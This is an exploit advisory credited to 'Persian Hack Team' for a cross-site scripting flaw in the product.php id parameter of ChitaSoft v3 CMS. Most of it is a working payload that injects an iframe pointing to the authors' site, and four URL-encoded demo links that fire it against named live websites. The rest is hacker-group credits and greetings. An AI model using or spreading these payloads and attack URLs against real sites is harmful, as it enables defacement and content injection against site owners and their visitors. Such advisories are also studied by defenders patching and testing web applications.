######################
# Exploit Title :   ChitaSoft v3 CMS Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage :  http://www.chitasoft.com/products/3
# Author Homepage : http://www.persian-team.ir
# Date: 2016/04/15
# Version : 3
######################
# PoC:
# product.php?id=[XSS]
# Payload = '><iframe src="http://persian-team.ir" width="450" height="200"></iframe>
# Demo:
# http://www.javdanesho.com/product.php?id=149%27%3E%3Ciframe%20src=%22http://persian-team.ir%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
# http://www.dafpublishingco.com/product.php?id=121%27%3E%3Ciframe%20src=%22http://persian-team.ir%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
# http://www.nashredaf.com/product.php?id=99%27%3E%3Ciframe%20src=%22http://persian-team.ir%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
# http://www.iranmodiran.com/product.php?id=1%27%3E%3Ciframe%20src=%22http://persian-team.ir%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Greetz : FireKernel And Milad_Hacking
# Homepage : http://www.persian-team.ir
######################